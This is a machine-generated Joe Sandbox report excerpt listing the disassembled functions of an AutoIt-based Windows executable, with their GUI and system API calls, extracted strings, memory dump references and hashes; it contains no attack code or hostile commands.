                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,0098F910), ref: 00983627
                                          • IsWindowVisible.USER32(?), ref: 0098364B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: 7c04251dd229f0ee8586e40baa63aa347d79064bc0b3b468c45100d6e7cc2017
                                          • Instruction ID: fa6d9f01ce321b989d5f466376f095effed26ae4fcd2ffceff113ba4750f42a2
                                          • Opcode Fuzzy Hash: 7c04251dd229f0ee8586e40baa63aa347d79064bc0b3b468c45100d6e7cc2017
                                          • Instruction Fuzzy Hash: E9D18C302143019FCB14FF10C596BAE7BE5AFD5754F148868F8865B3A3DB25EA0ACB41
                                          Function 0098A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0098A630
                                          • GetSysColorBrush.USER32(0000000F), ref: 0098A661
                                          • GetSysColor.USER32(0000000F), ref: 0098A66D
                                          • SetBkColor.GDI32(?,000000FF), ref: 0098A687
                                          • SelectObject.GDI32(?,00000000), ref: 0098A696
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0098A6C1
                                          • GetSysColor.USER32(00000010), ref: 0098A6C9
                                          • CreateSolidBrush.GDI32(00000000), ref: 0098A6D0
                                          • FrameRect.USER32(?,?,00000000), ref: 0098A6DF
                                          • DeleteObject.GDI32(00000000), ref: 0098A6E6
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0098A731
                                          • FillRect.USER32(?,?,00000000), ref: 0098A763
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098A78E
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(00000012), ref: 0098A903
                                            • Part of subcall function 0098A8CA: SetTextColor.GDI32(?,?), ref: 0098A907
                                            • Part of subcall function 0098A8CA: GetSysColorBrush.USER32(0000000F), ref: 0098A91D
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(0000000F), ref: 0098A928
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(00000011), ref: 0098A945
                                            • Part of subcall function 0098A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098A953
                                            • Part of subcall function 0098A8CA: SelectObject.GDI32(?,00000000), ref: 0098A964
                                            • Part of subcall function 0098A8CA: SetBkColor.GDI32(?,00000000), ref: 0098A96D
                                            • Part of subcall function 0098A8CA: SelectObject.GDI32(?,?), ref: 0098A97A
                                            • Part of subcall function 0098A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0098A999
                                            • Part of subcall function 0098A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098A9B0
                                            • Part of subcall function 0098A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0098A9C5
                                            • Part of subcall function 0098A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098A9ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          • Opcode ID: 45603c24cb7ef6fe87ccaff6a0c19458084c6e72e50372e7f5f6271cbf9307cc
                                          • Instruction ID: ab0821b58ca923b0b3656b51207f8943ba00f006cae5e75726cd03b09cc69830
                                          • Opcode Fuzzy Hash: 45603c24cb7ef6fe87ccaff6a0c19458084c6e72e50372e7f5f6271cbf9307cc
                                          • Instruction Fuzzy Hash: 77918E72418301EFDB10AF64DC08A6B7BA9FF89321F101B2AF562962A0D774D944DB52
                                          Function 00902C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00902CA2
                                          • DeleteObject.GDI32(00000000), ref: 00902CE8
                                          • DeleteObject.GDI32(00000000), ref: 00902CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00902CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00902D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0093C43B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0093C474
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0093C89D
                                            • Part of subcall function 00901B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00902036,?,00000000,?,?,?,?,009016CB,00000000,?), ref: 00901B9A
                                          • SendMessageW.USER32(?,00001053), ref: 0093C8DA
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0093C8F1
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0093C907
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0093C912
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: 75a63eeb8dc6861dc37fd3853a1af1c8de32bef3a9d6026bc1d17b9dc9bcca41
                                          • Instruction ID: 9b714b8dc1f04d2c74feb4cde219da0de500bb6b0166620af38207d7c2fdbd0b
                                          • Opcode Fuzzy Hash: 75a63eeb8dc6861dc37fd3853a1af1c8de32bef3a9d6026bc1d17b9dc9bcca41
                                          • Instruction Fuzzy Hash: 8E129D70604A11EFDB11CF24C898BA9B7E9BF45304F5445A9F89AEB2A2C731EC41DF91
                                          Function 009774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 009774DE
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0097759D
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009775DB
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009775ED
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00977633
                                          • GetClientRect.USER32(00000000,?), ref: 0097763F
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00977683
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00977692
                                          • GetStockObject.GDI32(00000011), ref: 009776A2
                                          • SelectObject.GDI32(00000000,00000000), ref: 009776A6
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009776B6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009776BF
                                          • DeleteDC.GDI32(00000000), ref: 009776C8
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009776F4
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0097770B
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00977746
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0097775A
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0097776B
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0097779B
                                          • GetStockObject.GDI32(00000011), ref: 009777A6
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009777B1
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009777BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 6806312c3b2e821a15f4840385dff6943ef91695764a38dc90e58bee0fc966fb
                                          • Instruction ID: 63813a5cf001d04ac091aff5fd02c6e1f3bf5a9981e26263a85a650d5844dd89
                                          • Opcode Fuzzy Hash: 6806312c3b2e821a15f4840385dff6943ef91695764a38dc90e58bee0fc966fb
                                          • Instruction Fuzzy Hash: EFA171B1A54609BFEB14DBA4DC4AFAEBBB9EB44710F008114FA15E72E0D770AD40DB60
                                          Function 0096AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096AD1E
                                          • GetDriveTypeW.KERNEL32(?,0098FAC0,?,\\.\,0098F910), ref: 0096ADFB
                                          • SetErrorMode.KERNEL32(00000000,0098FAC0,?,\\.\,0098F910), ref: 0096AF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: aef03af137042e3ab04342b8385d85667161c99d71180ada6ff80385317cea57
                                          • Instruction ID: d082318b7603237ae95c99bb593d0d49e0d9ed21fc5773d6eaff782737d1cdfc
                                          • Opcode Fuzzy Hash: aef03af137042e3ab04342b8385d85667161c99d71180ada6ff80385317cea57
                                          • Instruction Fuzzy Hash: 355167B0648105DFCB10DB50CA52DBEB3A9EF8C724B608456E407B72D1DA759D41EF53
                                          Function 009068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: 890aeecb58523e71ddd381abb4e22bac560d61b0012adeea4a68ea1a4821dde8
                                          • Instruction ID: e0ad2a9d5c864b3411a55961297fcdb8fb1837cd6d9afdeec2071232e7c535d8
                                          • Opcode Fuzzy Hash: 890aeecb58523e71ddd381abb4e22bac560d61b0012adeea4a68ea1a4821dde8
                                          • Instruction Fuzzy Hash: 168103B1700216BEDF20BF60EC42FAB776CAF85714F044025F905AA1D6EB74DE65C6A1
                                          Function 00989A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00989AD2
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00989B8B
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00989BA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0
                                          • API String ID: 2326795674-4108050209
                                          • Opcode ID: 389ea83614640452a1d9c89a142872f53cd4a6f1ff7faf4a62818b485be5e78b
                                          • Instruction ID: 898829ea4226a05f6401de09168097ccc89ff9d1b9aac4de79c5f92cc733bf82
                                          • Opcode Fuzzy Hash: 389ea83614640452a1d9c89a142872f53cd4a6f1ff7faf4a62818b485be5e78b
                                          • Instruction Fuzzy Hash: 8202CE30108201AFE729EF24C858BBABBE9FF49314F08492DF999D63A1D735D944DB52
                                          Function 0098A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0098A903
                                          • SetTextColor.GDI32(?,?), ref: 0098A907
                                          • GetSysColorBrush.USER32(0000000F), ref: 0098A91D
                                          • GetSysColor.USER32(0000000F), ref: 0098A928
                                          • CreateSolidBrush.GDI32(?), ref: 0098A92D
                                          • GetSysColor.USER32(00000011), ref: 0098A945
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098A953
                                          • SelectObject.GDI32(?,00000000), ref: 0098A964
                                          • SetBkColor.GDI32(?,00000000), ref: 0098A96D
                                          • SelectObject.GDI32(?,?), ref: 0098A97A
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0098A999
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098A9B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0098A9C5
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098A9ED
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0098AA14
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0098AA32
                                          • DrawFocusRect.USER32(?,?), ref: 0098AA3D
                                          • GetSysColor.USER32(00000011), ref: 0098AA4B
                                          • SetTextColor.GDI32(?,00000000), ref: 0098AA53
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0098AA67
                                          • SelectObject.GDI32(?,0098A5FA), ref: 0098AA7E
                                          • DeleteObject.GDI32(?), ref: 0098AA89
                                          • SelectObject.GDI32(?,?), ref: 0098AA8F
                                          • DeleteObject.GDI32(?), ref: 0098AA94
                                          • SetTextColor.GDI32(?,?), ref: 0098AA9A
                                          • SetBkColor.GDI32(?,?), ref: 0098AAA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 25dc2d163c45b844832556780c04eaa18441ca411fb1c8b71a5649222e169275
                                          • Instruction ID: bdda76f5e2820e171cf6ed9603514a840f3de24ce6867f6616d0b19d90d1efbb
                                          • Opcode Fuzzy Hash: 25dc2d163c45b844832556780c04eaa18441ca411fb1c8b71a5649222e169275
                                          • Instruction Fuzzy Hash: 32513B71914208EFDF10AFA4DC48EAE7BB9EB48320F215626F911AB3A1D7759940DB90
                                          Function 009889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00988AC1
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00988AD2
                                          • CharNextW.USER32(0000014E), ref: 00988B01
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00988B42
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00988B58
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00988B69
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00988B86
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00988BD8
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00988BEE
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00988C1F
                                          • _memset.LIBCMT ref: 00988C44
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00988C8D
                                          • _memset.LIBCMT ref: 00988CEC
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00988D16
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00988D6E
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00988E1B
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00988E3D
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00988E87
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00988EB4
                                          • DrawMenuBar.USER32(?), ref: 00988EC3
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00988EEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: 7ee9bc48c9ec6a8b01b1358b92dc4b5e9f0798fbb821faf31c04de2c0aa82799
                                          • Instruction ID: 771394a723d0d3ee4bb8491b9908f52d273195bb2d6ea9402db48363cb00b2af
                                          • Opcode Fuzzy Hash: 7ee9bc48c9ec6a8b01b1358b92dc4b5e9f0798fbb821faf31c04de2c0aa82799
                                          • Instruction Fuzzy Hash: 7BE18070914218AFDF20AF54CC84EEF7BB9EF45710F50815AFA15AA391DB749980DF60
                                          Function 0098488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 009849CA
                                          • GetDesktopWindow.USER32 ref: 009849DF
                                          • GetWindowRect.USER32(00000000), ref: 009849E6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00984A48
                                          • DestroyWindow.USER32(?), ref: 00984A74
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00984A9D
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00984ABB
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00984AE1
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00984AF6
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00984B09
                                          • IsWindowVisible.USER32(?), ref: 00984B29
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00984B44
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00984B58
                                          • GetWindowRect.USER32(?,?), ref: 00984B70
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00984B96
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00984BB0
                                          • CopyRect.USER32(?,?), ref: 00984BC7
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00984C32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 2f842bfb4b7e57c5c5ddfac9435115d69d38f00ed1730e5c0f6372d418dd2923
                                          • Instruction ID: 119d421c5388649f8a0fee62f702d41fcf1b3b59b08c0a3a0b85b2483fd2c463
                                          • Opcode Fuzzy Hash: 2f842bfb4b7e57c5c5ddfac9435115d69d38f00ed1730e5c0f6372d418dd2923
                                          • Instruction Fuzzy Hash: D1B17B71608341AFDB04EF64C844B6ABBE8BF88714F008A1DF999AB3A1D771EC05CB55
                                          Function 0096449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009644AC
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009644D2
                                          • _wcscpy.LIBCMT ref: 00964500
                                          • _wcscmp.LIBCMT ref: 0096450B
                                          • _wcscat.LIBCMT ref: 00964521
                                          • _wcsstr.LIBCMT ref: 0096452C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00964548
                                          • _wcscat.LIBCMT ref: 00964591
                                          • _wcscat.LIBCMT ref: 00964598
                                          • _wcsncpy.LIBCMT ref: 009645C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: e8d0152406589ede621ce9d4a1ac48a43d2e4dd02f841c8d2e3895997c855a6a
                                          • Instruction ID: 4c27d048c757c1e3f02c4a3bb29b74f6a6dabaa6e73be8b32ef9a9bfc1f12d4f
                                          • Opcode Fuzzy Hash: e8d0152406589ede621ce9d4a1ac48a43d2e4dd02f841c8d2e3895997c855a6a
                                          • Instruction Fuzzy Hash: 2C41D431A00214BBEB14BBB4EC47FBF77ACDFC5720F04046AF905E6182EA349A0197A5
                                          Function 009027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009028BC
                                          • GetSystemMetrics.USER32(00000007), ref: 009028C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009028EF
